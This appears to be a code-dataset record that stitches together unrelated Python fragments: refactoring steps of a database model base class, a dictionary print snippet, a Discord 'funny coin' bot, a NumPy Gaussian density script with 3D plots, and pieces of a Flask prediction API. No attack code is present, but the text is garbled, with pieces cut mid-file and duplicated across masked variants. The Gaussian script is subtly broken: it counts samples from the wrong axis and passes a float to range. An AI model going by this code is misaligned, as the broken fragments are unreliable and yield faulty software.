return_dict[key] = dict_values\n elif isinstance(value, datetime):\n return_dict[key] = value.isoformat()\n elif hasattr(value, 'to_dict'):\n return_dict[key] = value.to_dict(depth=depth + 1, lite=True)\n else:\n return_dict[key] = value\n return return_dict\n\n @classmethod\n def get_by_id(cls, id):\n schema = cls._get_cls_schema().query.get(id)\n if schema is None:\n raise ResponseError(info='对应编号信息不存在')\n return cls(schema)\n\n @classmethod\n def get_by_uid(cls, uid):\n schema = cls._get_cls_schema().query.filter_by(uid=uid).first()\n return cls(schema)\n",
"step-4": "from abc import ABCMeta, abstractmethod\nfrom datetime import datetime\nfrom enum import Enum\nfrom application.response import ResponseError\n\n\nclass ModelBase:\n __metaclass__ = ABCMeta\n\n @classmethod\n @abstractmethod\n def _get_cls_schema(cls):\n pass\n\n def __new__(cls, schema):\n if schema is None:\n return None\n else:\n return object.__new__(cls)\n\n def __init__(self, schema):\n self.schema = schema\n\n @property\n def id(self):\n return self.schema.id\n\n @property\n def uid(self):\n return self.schema.uid\n\n def refresh(self):\n self.schema = self._get_cls_schema().query.get(self.schema.id)\n\n def to_dict(self, include_keys=None, exclude_keys=None, depth=0, lite=False\n ):\n \"\"\" 把用 property 装饰的属性封装到一个 dict 中再返回\n :param include_keys, list, 指定需要返回的属性, 默认为全部, 但不包含下划线开始的属性\n :param exclude_keys, list, 指定需要排除的属性, 默认为 []\n :param depth, int, 深度, object 可能含有对其它 object 的引用, object.to_dict() 调用限定两层\n :param lite, boolean, 是否为精简版, 在精简版中还会考虑 object 的 lite_exclude_keys\n \"\"\"\n return_dict = {}\n attrs = self.__class__.__dict__\n include_keys = include_keys or [name for name in attrs.keys() if \n not name.startswith('_')]\n exclude_keys = exclude_keys or []\n if lite is True:\n lite_exclude_keys = getattr(self, 'lite_exclude_keys', [])\n exclude_keys = exclude_keys + lite_exclude_keys\n include_keys = [name for name in include_keys if name not in\n exclude_keys]\n if depth > 1:\n return self.uid\n for key, value in attrs.items():\n if key not in include_keys:\n continue\n if not isinstance(value, property):\n continue\n value = getattr(self, key)\n if isinstance(value, Enum):\n return_dict[key] = value.value\n elif isinstance(value, list):\n list_values = []\n for item in value:\n if hasattr(item, 'to_dict'):\n list_values.append(item.to_dict(depth=depth + 1,\n lite=True))\n else:\n list_values.append(item)\n return_dict[key] = list_values\n elif isinstance(value, dict):\n dict_values = {}\n for k, v in value.items():\n if hasattr(v, 'to_dict'):\n dict_values[k] = v.to_dict(depth=depth + 1, lite=True)\n else:\n dict_values[k] = v\n return_dict[key] = dict_values\n elif isinstance(value, datetime):\n return_dict[key] = value.isoformat()\n elif hasattr(value, 'to_dict'):\n return_dict[key] = value.to_dict(depth=depth + 1, lite=True)\n else:\n return_dict[key] = value\n return return_dict\n\n @classmethod\n def get_by_id(cls, id):\n schema = cls._get_cls_schema().query.get(id)\n if schema is None:\n raise ResponseError(info='对应编号信息不存在')\n return cls(schema)\n\n @classmethod\n def get_by_uid(cls, uid):\n schema = cls._get_cls_schema().query.filter_by(uid=uid).first()\n return cls(schema)\n",
"step-5": "from abc import ABCMeta, abstractmethod\nfrom datetime import datetime\nfrom enum import Enum\n\nfrom application.response import ResponseError\n\n\nclass ModelBase:\n __metaclass__ = ABCMeta\n\n @classmethod\n @abstractmethod\n def _get_cls_schema(cls):\n pass\n\n def __new__(cls, schema):\n if schema is None:\n return None\n else:\n return object.__new__(cls)\n\n def __init__(self, schema):\n self.schema = schema\n\n @property\n def id(self):\n return self.schema.id\n\n @property\n def uid(self):\n return self.schema.uid\n\n def refresh(self):\n self.schema = self._get_cls_schema().query.get(self.schema.id)\n\n def to_dict(self, include_keys=None, exclude_keys=None, depth=0, lite=False):\n \"\"\" 把用 property 装饰的属性封装到一个 dict 中再返回\n :param include_keys, list, 指定需要返回的属性, 默认为全部, 但不包含下划线开始的属性\n :param exclude_keys, list, 指定需要排除的属性, 默认为 []\n :param depth, int, 深度, object 可能含有对其它 object 的引用, object.to_dict() 调用限定两层\n :param lite, boolean, 是否为精简版, 在精简版中还会考虑 object 的 lite_exclude_keys\n \"\"\"\n return_dict = {}\n\n attrs = self.__class__.__dict__\n\n include_keys = include_keys or [\n name for name in attrs.keys() if not name.startswith(\"_\")\n ]\n exclude_keys = exclude_keys or []\n\n if lite is True:\n lite_exclude_keys = getattr(self, \"lite_exclude_keys\", [])\n exclude_keys = exclude_keys + lite_exclude_keys\n\n include_keys = [name for name in include_keys if name not in exclude_keys]\n\n if depth > 1:\n return self.uid\n\n for key, value in attrs.items():\n if key not in include_keys:\n continue\n if not isinstance(value, property):\n continue\n value = getattr(self, key)\n if isinstance(value, Enum):\n return_dict[key] = value.value\n\n elif isinstance(value, list):\n list_values = []\n for item in value:\n if hasattr(item, \"to_dict\"):\n list_values.append(item.to_dict(depth=depth + 1, lite=True))\n else:\n list_values.append(item)\n return_dict[key] = list_values\n\n elif isinstance(value, dict):\n dict_values = {}\n for k, v in value.items():\n if hasattr(v, \"to_dict\"):\n dict_values[k] = v.to_dict(depth=depth + 1, lite=True)\n else:\n dict_values[k] = v\n return_dict[key] = dict_values\n\n elif isinstance(value, datetime):\n return_dict[key] = value.isoformat()\n\n elif hasattr(value, \"to_dict\"):\n return_dict[key] = value.to_dict(depth=depth + 1, lite=True)\n\n else:\n return_dict[key] = value\n return return_dict\n\n @classmethod\n def get_by_id(cls, id):\n schema = cls._get_cls_schema().query.get(id)\n if schema is None:\n raise ResponseError(info='对应编号信息不存在')\n return cls(schema)\n\n @classmethod\n def get_by_uid(cls, uid):\n schema = cls._get_cls_schema().query.filter_by(uid=uid).first()\n return cls(schema)\n",
"step-ids": [
6,
8,
9,
12,
13
]
}
|
[
6,
8,
9,
12,
13
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
print(dic['name'])
<|reserved_special_token_1|>
dic = {'name': 'Eric', 'age': '25'}
print(dic['name'])
<|reserved_special_token_1|>
dic = {'name': 'Eric', 'age': '25'}  # dictionary literal
print(dic['name'])
|
flexible
|
{
"blob_id": "09c3a10230e7d0b3b893ccf236c39fc2dc12b2c6",
"index": 1097,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nprint(dic['name'])\n",
"step-3": "dic = {'name': 'Eric', 'age': '25'}\nprint(dic['name'])\n",
"step-4": "dic = {'name': 'Eric', 'age': '25'} # 딕셔너리 형태\n\n\nprint(dic['name'])\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
import discord
from discord.ext import commands
from discord.ext.commands import Bot
import asyncio
import random
import requests
import os
#Discord Tech Stuff
BOT_PREFIX = ("!")
client = discord.Client()
client = Bot(command_prefix=BOT_PREFIX)
#Functions of the Funny Coin
@client.command()
async def wasitfunny():
possible_responses = [
"Per the judgement from the committee of comedy, we have decided that the joke was indeed funny",
"Per the judgement from the committee of comedy, we have decided that the joke was not fucking funny you cretin",
]
await client.say(random.choice(possible_responses))
@client.command()
async def isitfunny(funny_subject):
responses = [
"Nah that wasn't really funny",
"There is no funny present",
"YOU FORGOT THE FUNNY",
"There is no comedy present here",
"hahaaaaa",
"Funnt",
"Hey man that's pretty funny thanks for sharing",
"jajajajajajajajajaja",
]
await client.say("regarding " + str(funny_subject) + ", " + random.choice(responses))
@client.command()
async def isitironic(irony_subjects):
irony_responses = [
"one irony point",
"that's pretty ironic man",
"ironic",
"no irony present",
"minus irony point",
"where is the irony? I was told there would be irony?",
]
await client.say(random.choice(irony_responses))
#Alex, Me, Chris, Anthony Coins, Want to add system that has coins for everyone and you can make a like profile for coins
afc = 0
mfc = 0
cfc = 0
anfc = 0
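# A more scalable variant (sketch, not part of the original bot): keep all
# balances in one dict keyed by name, using the same pre-1.0 discord.py API
# as the commands above, instead of adding a new global per person.
funny_coins = {}
@client.command()
async def fc(name, amount):
    funny_coins[name] = funny_coins.get(name, 0) + int(amount)
    await client.say(name + " has " + str(funny_coins[name]) + " funny coins")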
@client.command()
async def alexfc(anum):
global afc
afc += int(anum)
await client.say("Alex has " + str(afc) + " funny coins")
@client.command()
async def muhfc(mnum):
global mfc
mfc += int(mnum)
await client.say("Muhammad has " + str(mfc) + " funny coins")
@client.command()
async def chrisfc(cnum):
global cfc
cfc += int(cnum)
await client.say("Chris has " + str(cfc) + " funny coins")
@client.command()
async def antfc(anthnum):
global anfc
anfc += int(anthnum)
await client.say("Anthony has " + str(anfc) + " funny coins")
client.run(os.environ.get("TOKEN"))  # read the bot token from the TOKEN environment variable
|
normal
|
{
"blob_id": "f047afeb6462ab01a8fea1f3c8693608335eb960",
"index": 3488,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\[email protected]()\nasync def wasitfunny():\n possible_responses = [\n 'Per the judgement from the committee of comedy, we have decided that the joke was indeed funny'\n ,\n 'Per the judgement from the committee of comedy, we have decided that the joke was not fucking funny you cretin'\n ]\n await client.say(random.choice(possible_responses))\n\n\[email protected]()\nasync def isitfunny(funny_subject):\n responses = [\"Nah that wasn't really funny\",\n 'There is no funny present', 'YOU FORGOT THE FUNNY',\n 'There is no comedy present here', 'hahaaaaa', 'Funnt',\n \"Hey man that's pretty funny thanks for sharing\",\n 'jajajajajajajajajaja']\n await client.say('regarding ' + str(funny_subject) + ', ' + random.\n choice(responses))\n\n\[email protected]()\nasync def isitironic(irony_subjects):\n irony_responses = ['one irony point', \"that's pretty ironic man\",\n 'ironic', 'no irony present', 'minus irony point',\n 'where is the irony? I was told there would be irony?']\n await client.say(random.choice(irony_responses))\n\n\n<mask token>\n\n\[email protected]()\nasync def alexfc(anum):\n global afc\n afc += int(anum)\n await client.say('Alex has ' + str(afc) + ' funny coins')\n\n\[email protected]()\nasync def muhfc(mnum):\n global mfc\n mfc += int(mnum)\n await client.say('Muhammad has ' + str(mfc) + ' funny coins')\n\n\[email protected]()\nasync def chrisfc(cnum):\n global cfc\n cfc += int(cnum)\n await client.say('Chris has ' + str(cfc) + ' funny coins')\n\n\[email protected]()\nasync def antfc(anthnum):\n global anfc\n anfc += int(anthnum)\n await client.say('Anthony has ' + str(anfc) + ' funny coins')\n\n\nclient.run(str(os.environ.get(TOKEN)))\n",
"step-3": "<mask token>\nBOT_PREFIX = '!'\nclient = discord.Client()\nclient = Bot(command_prefix=BOT_PREFIX)\n\n\[email protected]()\nasync def wasitfunny():\n possible_responses = [\n 'Per the judgement from the committee of comedy, we have decided that the joke was indeed funny'\n ,\n 'Per the judgement from the committee of comedy, we have decided that the joke was not fucking funny you cretin'\n ]\n await client.say(random.choice(possible_responses))\n\n\[email protected]()\nasync def isitfunny(funny_subject):\n responses = [\"Nah that wasn't really funny\",\n 'There is no funny present', 'YOU FORGOT THE FUNNY',\n 'There is no comedy present here', 'hahaaaaa', 'Funnt',\n \"Hey man that's pretty funny thanks for sharing\",\n 'jajajajajajajajajaja']\n await client.say('regarding ' + str(funny_subject) + ', ' + random.\n choice(responses))\n\n\[email protected]()\nasync def isitironic(irony_subjects):\n irony_responses = ['one irony point', \"that's pretty ironic man\",\n 'ironic', 'no irony present', 'minus irony point',\n 'where is the irony? I was told there would be irony?']\n await client.say(random.choice(irony_responses))\n\n\nafc = 0\nmfc = 0\ncfc = 0\nanfc = 0\n\n\[email protected]()\nasync def alexfc(anum):\n global afc\n afc += int(anum)\n await client.say('Alex has ' + str(afc) + ' funny coins')\n\n\[email protected]()\nasync def muhfc(mnum):\n global mfc\n mfc += int(mnum)\n await client.say('Muhammad has ' + str(mfc) + ' funny coins')\n\n\[email protected]()\nasync def chrisfc(cnum):\n global cfc\n cfc += int(cnum)\n await client.say('Chris has ' + str(cfc) + ' funny coins')\n\n\[email protected]()\nasync def antfc(anthnum):\n global anfc\n anfc += int(anthnum)\n await client.say('Anthony has ' + str(anfc) + ' funny coins')\n\n\nclient.run(str(os.environ.get(TOKEN)))\n",
"step-4": "import discord\nfrom discord.ext import commands\nfrom discord.ext.commands import Bot\nimport asyncio\nimport random\nimport requests\nimport os\nBOT_PREFIX = '!'\nclient = discord.Client()\nclient = Bot(command_prefix=BOT_PREFIX)\n\n\[email protected]()\nasync def wasitfunny():\n possible_responses = [\n 'Per the judgement from the committee of comedy, we have decided that the joke was indeed funny'\n ,\n 'Per the judgement from the committee of comedy, we have decided that the joke was not fucking funny you cretin'\n ]\n await client.say(random.choice(possible_responses))\n\n\[email protected]()\nasync def isitfunny(funny_subject):\n responses = [\"Nah that wasn't really funny\",\n 'There is no funny present', 'YOU FORGOT THE FUNNY',\n 'There is no comedy present here', 'hahaaaaa', 'Funnt',\n \"Hey man that's pretty funny thanks for sharing\",\n 'jajajajajajajajajaja']\n await client.say('regarding ' + str(funny_subject) + ', ' + random.\n choice(responses))\n\n\[email protected]()\nasync def isitironic(irony_subjects):\n irony_responses = ['one irony point', \"that's pretty ironic man\",\n 'ironic', 'no irony present', 'minus irony point',\n 'where is the irony? I was told there would be irony?']\n await client.say(random.choice(irony_responses))\n\n\nafc = 0\nmfc = 0\ncfc = 0\nanfc = 0\n\n\[email protected]()\nasync def alexfc(anum):\n global afc\n afc += int(anum)\n await client.say('Alex has ' + str(afc) + ' funny coins')\n\n\[email protected]()\nasync def muhfc(mnum):\n global mfc\n mfc += int(mnum)\n await client.say('Muhammad has ' + str(mfc) + ' funny coins')\n\n\[email protected]()\nasync def chrisfc(cnum):\n global cfc\n cfc += int(cnum)\n await client.say('Chris has ' + str(cfc) + ' funny coins')\n\n\[email protected]()\nasync def antfc(anthnum):\n global anfc\n anfc += int(anthnum)\n await client.say('Anthony has ' + str(anfc) + ' funny coins')\n\n\nclient.run(str(os.environ.get(TOKEN)))\n",
"step-5": "import discord\nfrom discord.ext import commands\nfrom discord.ext.commands import Bot\nimport asyncio\nimport random\nimport requests\nimport os\n\n\n#Discord Tech Stuff\nBOT_PREFIX = (\"!\")\n\n\nclient = discord.Client()\nclient = Bot(command_prefix=BOT_PREFIX)\n\n#Functions of the Funny Coin\[email protected]()\nasync def wasitfunny():\n possible_responses = [\n \"Per the judgement from the committee of comedy, we have decided that the joke was indeed funny\",\n \"Per the judgement from the committee of comedy, we have decided that the joke was not fucking funny you cretin\",\n ]\n await client.say(random.choice(possible_responses))\n\[email protected]()\nasync def isitfunny(funny_subject):\n responses = [\n \"Nah that wasn't really funny\",\n \"There is no funny present\",\n \"YOU FORGOT THE FUNNY\",\n \"There is no comedy present here\",\n \"hahaaaaa\",\n \"Funnt\",\n \"Hey man that's pretty funny thanks for sharing\",\n \"jajajajajajajajajaja\",\n ]\n await client.say(\"regarding \" + str(funny_subject) + \", \" + random.choice(responses))\n\n\[email protected]()\nasync def isitironic(irony_subjects):\n irony_responses = [\n \"one irony point\",\n \"that's pretty ironic man\",\n \"ironic\",\n \"no irony present\",\n \"minus irony point\",\n \"where is the irony? I was told there would be irony?\",\n ]\n await client.say(random.choice(irony_responses))\n\n#Alex, Me, Chris, Anthony Coins, Want to add system that has coins for everyone and you can make a like profile for coins\nafc = 0\nmfc = 0\ncfc = 0\nanfc = 0\n\n\[email protected]()\nasync def alexfc(anum):\n global afc\n afc += int(anum)\n await client.say(\"Alex has \" + str(afc) + \" funny coins\")\n\[email protected]()\nasync def muhfc(mnum):\n global mfc\n mfc += int(mnum)\n await client.say(\"Muhammad has \" + str(mfc) + \" funny coins\")\n\[email protected]()\nasync def chrisfc(cnum):\n global cfc\n cfc += int(cnum)\n await client.say(\"Chris has \" + str(cfc) + \" funny coins\")\n\[email protected]()\nasync def antfc(anthnum):\n global anfc\n anfc += int(anthnum)\n await client.say(\"Anthony has \" + str(anfc) + \" funny coins\")\n\n \n\n\nclient.run(str(os.environ.get(TOKEN)))\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
import numpy as np
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
from matplotlib import cm
from matplotlib.lines import Line2D
np.random.seed(42)
n_samples = 5000
MU = np.array([0.5, 1.5])
COV = np.array([[1., 0.7], [0.7, 2.]])
def get_samples(n):
return np.random.multivariate_normal(mean=MU, cov=COV, size=n)
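# BackgroundCheck scores how "foreground" a point is by comparing its density
# to the model's peak density: p_foreground(x) = p(x) / max_x' p(x').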
class BackgroundCheck(object):
def __init__(self, model):
self.model = model
def fit(self, x):
self.model.fit(x)
def prob_foreground(self, x):
l = self.model.likelihood(x)
l_max = self.model.max
return np.true_divide(l, l_max)
def prob_background(self, x):
return 1 - self.prob_foreground(x)
def predict_proba(self, x):
return self.prob_background(x)
class GaussianEstimation(object):
def __init__(self):
self.mu = None
self.cov = None
self.N = 0
def fit(self, x):
        N = x.shape[0]  # number of samples (rows); shape[1] is the feature count
        mu = np.mean(x, axis=0)
        cov = np.cov(x, rowvar=False)
        if self.N == 0:  # '==' rather than 'is': identity checks on ints are unreliable
            self.N = N
            self.mu = mu
            self.k = len(mu)
            self.cov = cov
        else:
            # sample-count-weighted running average of the batch estimates
            self.mu = np.true_divide((self.mu * self.N) + (mu * N), self.N + N)
            self.cov = np.true_divide((self.cov * self.N) + (cov * N), self.N + N)
            self.N += N
def likelihood(self, x):
return np.exp(self.log_likelihood(x))
    def log_likelihood(self, x):
        x_mu = x - self.mu
        inverse = np.linalg.inv(self.cov)
        # per-row quadratic form (x - mu)^T Sigma^{-1} (x - mu)
        exp = np.array([np.inner(np.inner(a, inverse.T), a) for a in x_mu])
        # log N(x; mu, Sigma) = -0.5 * (log|Sigma| + quadratic form + k * log(2*pi))
        return -0.5 * (np.log(np.linalg.det(self.cov))
                       + exp
                       + self.k * np.log(2 * np.pi))
@property
def max(self):
return self.likelihood(self.mu.reshape(1,-1))
model = BackgroundCheck(GaussianEstimation())
for i in range(n_samples // 2):  # floor division: range() needs an int in Python 3
x = get_samples(2)
model.fit(x)
x = get_samples(n_samples)
p_foreground = 1 - model.predict_proba(x)
fig = plt.figure('scatter')
fig.clf()
ax = fig.add_subplot(111, projection='3d')
ax.scatter(x[:,0], x[:,1], p_foreground)
ax.set_xlabel('$x_0$')
ax.set_ylabel('$x_1$')
ax.set_zlabel('p_foreground')
fig.savefig('p_foreground_x.svg')
X = np.linspace(min(x[:,0]), max(x[:,0]), 30)
Y = np.linspace(min(x[:,1]), max(x[:,1]), 30)
X, Y = np.meshgrid(X, Y)
grid = np.concatenate((X.reshape(-1,1), Y.reshape(-1,1)), axis=1)
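# evaluate the foreground score over the 30x30 grid, reshaped back for plotting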
p_foreground = 1 - model.predict_proba(grid).reshape(X.shape[0], X.shape[1])
fig = plt.figure('surface')
fig.clf()
ax = fig.add_subplot(111, projection='3d')
ax.plot_surface(X, Y, p_foreground, cmap=cm.coolwarm)
ax.set_xlabel('$x_0$')
ax.set_ylabel('$x_1$')
ax.set_zlabel('p_foreground')
fig.savefig('p_foreground_grid.svg')
|
normal
|
{
"blob_id": "d61b04539295f6b25e7f6589d32f313e3c6df82f",
"index": 1180,
"step-1": "<mask token>\n\n\nclass BackgroundCheck(object):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def predict_proba(self, x):\n return self.prob_background(x)\n\n\nclass GaussianEstimation(object):\n\n def __init__(self):\n self.mu = None\n self.cov = None\n self.N = 0\n\n def fit(self, x):\n N = x.shape[1]\n mu = np.mean(x, axis=0)\n cov = np.cov(x, rowvar=False)\n if self.N is 0:\n self.N = N\n self.mu = mu\n self.k = len(mu)\n self.cov = cov\n else:\n self.mu = np.true_divide(self.mu * self.N + mu * N, self.N + N)\n self.cov = np.true_divide(self.cov * self.N + cov * N, self.N + N)\n self.N += N\n\n def likelihood(self, x):\n return np.exp(self.log_likelihood(x))\n\n def log_likelihood(self, x):\n x_mu = x - self.mu\n inverse = np.linalg.inv(self.cov)\n exp = np.array([np.inner(np.inner(a, inverse.T), a) for a in x_mu])\n return -0.5 * (np.log(np.linalg.det(self.cov)) + exp + self.k * np.\n log(2 * np.pi))\n\n @property\n def max(self):\n return self.likelihood(self.mu.reshape(1, -1))\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass BackgroundCheck(object):\n <mask token>\n <mask token>\n\n def prob_foreground(self, x):\n l = self.model.likelihood(x)\n l_max = self.model.max\n return np.true_divide(l, l_max)\n\n def prob_background(self, x):\n return 1 - self.prob_foreground(x)\n\n def predict_proba(self, x):\n return self.prob_background(x)\n\n\nclass GaussianEstimation(object):\n\n def __init__(self):\n self.mu = None\n self.cov = None\n self.N = 0\n\n def fit(self, x):\n N = x.shape[1]\n mu = np.mean(x, axis=0)\n cov = np.cov(x, rowvar=False)\n if self.N is 0:\n self.N = N\n self.mu = mu\n self.k = len(mu)\n self.cov = cov\n else:\n self.mu = np.true_divide(self.mu * self.N + mu * N, self.N + N)\n self.cov = np.true_divide(self.cov * self.N + cov * N, self.N + N)\n self.N += N\n\n def likelihood(self, x):\n return np.exp(self.log_likelihood(x))\n\n def log_likelihood(self, x):\n x_mu = x - self.mu\n inverse = np.linalg.inv(self.cov)\n exp = np.array([np.inner(np.inner(a, inverse.T), a) for a in x_mu])\n return -0.5 * (np.log(np.linalg.det(self.cov)) + exp + self.k * np.\n log(2 * np.pi))\n\n @property\n def max(self):\n return self.likelihood(self.mu.reshape(1, -1))\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass BackgroundCheck(object):\n\n def __init__(self, model):\n self.model = model\n\n def fit(self, x):\n self.model.fit(x)\n\n def prob_foreground(self, x):\n l = self.model.likelihood(x)\n l_max = self.model.max\n return np.true_divide(l, l_max)\n\n def prob_background(self, x):\n return 1 - self.prob_foreground(x)\n\n def predict_proba(self, x):\n return self.prob_background(x)\n\n\nclass GaussianEstimation(object):\n\n def __init__(self):\n self.mu = None\n self.cov = None\n self.N = 0\n\n def fit(self, x):\n N = x.shape[1]\n mu = np.mean(x, axis=0)\n cov = np.cov(x, rowvar=False)\n if self.N is 0:\n self.N = N\n self.mu = mu\n self.k = len(mu)\n self.cov = cov\n else:\n self.mu = np.true_divide(self.mu * self.N + mu * N, self.N + N)\n self.cov = np.true_divide(self.cov * self.N + cov * N, self.N + N)\n self.N += N\n\n def likelihood(self, x):\n return np.exp(self.log_likelihood(x))\n\n def log_likelihood(self, x):\n x_mu = x - self.mu\n inverse = np.linalg.inv(self.cov)\n exp = np.array([np.inner(np.inner(a, inverse.T), a) for a in x_mu])\n return -0.5 * (np.log(np.linalg.det(self.cov)) + exp + self.k * np.\n log(2 * np.pi))\n\n @property\n def max(self):\n return self.likelihood(self.mu.reshape(1, -1))\n\n\n<mask token>\n",
"step-4": "<mask token>\n\n\ndef get_samples(n):\n return np.random.multivariate_normal(mean=MU, cov=COV, size=n)\n\n\nclass BackgroundCheck(object):\n\n def __init__(self, model):\n self.model = model\n\n def fit(self, x):\n self.model.fit(x)\n\n def prob_foreground(self, x):\n l = self.model.likelihood(x)\n l_max = self.model.max\n return np.true_divide(l, l_max)\n\n def prob_background(self, x):\n return 1 - self.prob_foreground(x)\n\n def predict_proba(self, x):\n return self.prob_background(x)\n\n\nclass GaussianEstimation(object):\n\n def __init__(self):\n self.mu = None\n self.cov = None\n self.N = 0\n\n def fit(self, x):\n N = x.shape[1]\n mu = np.mean(x, axis=0)\n cov = np.cov(x, rowvar=False)\n if self.N is 0:\n self.N = N\n self.mu = mu\n self.k = len(mu)\n self.cov = cov\n else:\n self.mu = np.true_divide(self.mu * self.N + mu * N, self.N + N)\n self.cov = np.true_divide(self.cov * self.N + cov * N, self.N + N)\n self.N += N\n\n def likelihood(self, x):\n return np.exp(self.log_likelihood(x))\n\n def log_likelihood(self, x):\n x_mu = x - self.mu\n inverse = np.linalg.inv(self.cov)\n exp = np.array([np.inner(np.inner(a, inverse.T), a) for a in x_mu])\n return -0.5 * (np.log(np.linalg.det(self.cov)) + exp + self.k * np.\n log(2 * np.pi))\n\n @property\n def max(self):\n return self.likelihood(self.mu.reshape(1, -1))\n\n\n<mask token>\n",
"step-5": "import numpy as np\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom matplotlib import cm\nfrom matplotlib.lines import Line2D\n\nnp.random.seed(42)\n\nn_samples = 5000\nMU = np.array([0.5, 1.5])\nCOV = np.array([[1., 0.7], [0.7, 2.]])\n\ndef get_samples(n):\n return np.random.multivariate_normal(mean=MU, cov=COV, size=n)\n\nclass BackgroundCheck(object):\n def __init__(self, model):\n self.model = model\n\n def fit(self, x):\n self.model.fit(x)\n\n def prob_foreground(self, x):\n l = self.model.likelihood(x)\n l_max = self.model.max\n return np.true_divide(l, l_max)\n\n def prob_background(self, x):\n return 1 - self.prob_foreground(x)\n\n def predict_proba(self, x):\n return self.prob_background(x)\n\n\nclass GaussianEstimation(object):\n def __init__(self):\n self.mu = None\n self.cov = None\n self.N = 0\n\n def fit(self, x):\n N = x.shape[1]\n mu = np.mean(x, axis=0)\n cov = np.cov(x, rowvar=False)\n\n if self.N is 0:\n self.N = N\n self.mu = mu\n self.k = len(mu)\n self.cov = cov\n else:\n self.mu = np.true_divide((self.mu * self.N) + (mu * N), self.N + N)\n self.cov = np.true_divide((self.cov * self.N) + (cov * N), self.N + N)\n self.N += N\n\n def likelihood(self, x):\n return np.exp(self.log_likelihood(x))\n\n def log_likelihood(self, x):\n x_mu = x - self.mu\n # a = np.array([[1, 2]])\n # b = np.array([[1, 2],[3,4]])\n # np.inner(np.inner(a, b.T), a)\n inverse = np.linalg.inv(self.cov)\n exp = np.array([np.inner(np.inner(a, inverse.T), a) for a in x_mu])\n return - 0.5 * (\n np.log(np.linalg.det(self.cov))\n + exp \\\n + self.k * np.log(2*np.pi)\n )\n\n @property\n def max(self):\n return self.likelihood(self.mu.reshape(1,-1))\n\n\nmodel = BackgroundCheck(GaussianEstimation())\nfor i in range(n_samples/2):\n x = get_samples(2)\n model.fit(x)\n\nx = get_samples(n_samples)\n\np_foreground = 1 - model.predict_proba(x)\nfig = plt.figure('scatter')\nfig.clf()\nax = fig.add_subplot(111, projection='3d')\nax.scatter(x[:,0], x[:,1], p_foreground)\nax.set_xlabel('$x_0$')\nax.set_ylabel('$x_1$')\nax.set_zlabel('p_foreground')\nfig.savefig('p_foreground_x.svg')\n\n\nX = np.linspace(min(x[:,0]), max(x[:,0]), 30)\nY = np.linspace(min(x[:,1]), max(x[:,1]), 30)\nX, Y = np.meshgrid(X, Y)\n\ngrid = np.concatenate((X.reshape(-1,1), Y.reshape(-1,1)), axis=1)\np_foreground = 1 - model.predict_proba(grid).reshape(X.shape[0], X.shape[1])\n\nfig = plt.figure('surface')\nfig.clf()\nax = fig.add_subplot(111, projection='3d')\nax.plot_surface(X, Y, p_foreground, cmap=cm.coolwarm)\nax.set_xlabel('$x_0$')\nax.set_ylabel('$x_1$')\nax.set_zlabel('p_foreground')\nfig.savefig('p_foreground_grid.svg')\n",
"step-ids": [
8,
10,
12,
13,
17
]
}
|
[
8,
10,
12,
13,
17
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
def ex(x, y):
    # print and return the larger of the two values
    larger = x if x > y else y
    print(larger)
    return larger
|
flexible
|
{
"blob_id": "4ffc00e9425992bdd8277341d67a0739119a4798",
"index": 2773,
"step-1": "<mask token>\n",
"step-2": "def ex(x, y):\n max = 0\n print(x) if x > y else print(y)\n return max\n",
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0,
1
]
}
|
[
0,
1
] |
<|reserved_special_token_0|>
@api.route('/predict')
@api.expect(parser)
class Predict(Resource):
<|reserved_special_token_0|>
@api.route('/predict/<string:companyid>/<string:accountid>')
@api.expect(parser)
class PredictEmployeeByCompany(Resource):
@api.marshal_with(modelByEmployee)
def get(self, companyid, accountid):
args = parser.parse_args()
return getPredictionByEmployee(companyid, [int(accountid)], args[
'predictdate'])
@api.route('/predict/<string:companyid>')
@api.expect(parser)
class PredictByCompany(Resource):
@api.marshal_with(modelByEmployee)
def get(self, companyid):
args = parser.parse_args()
return getPredictionByEmployee(companyid, None, args['predictdate'])
@api.expect(predict_accounts)
@api.marshal_with(modelByEmployee)
def post(self, companyid):
args = parser.parse_args()
return getPredictionByEmployee(companyid, request.get_json()[
'accountids'], args['predictdate'])
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
@api.route('/predict')
@api.expect(parser)
class Predict(Resource):
@api.expect(predict_fields)
@api.marshal_with(model)
def post(self):
args = parser.parse_args()
return getPrediction(request.get_json(), args['predictdate'])
@api.route('/predict/<string:companyid>/<string:accountid>')
@api.expect(parser)
class PredictEmployeeByCompany(Resource):
@api.marshal_with(modelByEmployee)
def get(self, companyid, accountid):
args = parser.parse_args()
return getPredictionByEmployee(companyid, [int(accountid)], args[
'predictdate'])
@api.route('/predict/<string:companyid>')
@api.expect(parser)
class PredictByCompany(Resource):
@api.marshal_with(modelByEmployee)
def get(self, companyid):
args = parser.parse_args()
return getPredictionByEmployee(companyid, None, args['predictdate'])
@api.expect(predict_accounts)
@api.marshal_with(modelByEmployee)
def post(self, companyid):
args = parser.parse_args()
return getPredictionByEmployee(companyid, request.get_json()[
'accountids'], args['predictdate'])
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
@api.route('/predict')
@api.expect(parser)
class Predict(Resource):
@api.expect(predict_fields)
@api.marshal_with(model)
def post(self):
args = parser.parse_args()
return getPrediction(request.get_json(), args['predictdate'])
@api.route('/predict/<string:companyid>/<string:accountid>')
@api.expect(parser)
class PredictEmployeeByCompany(Resource):
@api.marshal_with(modelByEmployee)
def get(self, companyid, accountid):
args = parser.parse_args()
return getPredictionByEmployee(companyid, [int(accountid)], args[
'predictdate'])
@api.route('/predict/<string:companyid>')
@api.expect(parser)
class PredictByCompany(Resource):
@api.marshal_with(modelByEmployee)
def get(self, companyid):
args = parser.parse_args()
return getPredictionByEmployee(companyid, None, args['predictdate'])
@api.expect(predict_accounts)
